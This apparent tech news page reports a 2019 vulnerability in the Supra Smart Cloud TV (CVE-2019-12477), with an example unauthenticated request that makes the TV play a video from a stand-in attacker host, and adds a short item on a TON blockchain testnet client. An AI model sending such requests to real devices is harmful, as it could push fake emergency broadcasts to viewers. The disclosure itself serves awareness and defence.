Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   311

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).

TON Blockchain Testnet Lite Client to be Available

Telegram team hadn't confirmed the authenticity of the page and the data published on it
30 May 2019   321

Users have gained access to the test network of the Telegram Open Network (TON) blockchain platform - a preliminary version of the light client has been published.

This simplified version includes only the files needed for compilation, in particular, the RocksDB database and the Abseil library. After assembling and configuring the light client, it connects to the full node of the TON test network.

In addition, the site published step-by-step instructions for creating smart contracts in TON in the Fift programming language specially created for Telegram.

Additionally, users can familiarize themselves with the description of the TON virtual machine and blockchain platform.

It should be noted that representatives of Telegram did not publicly confirm the accuracy of the page and the data published on it.

Recall that the launch of the TON blockchain platform will take place in the third quarter of 2019. Earlier, developers reported on the successful conduct of a closed testing project.

You can get more info and download source code, configutation file, etc at the webpage.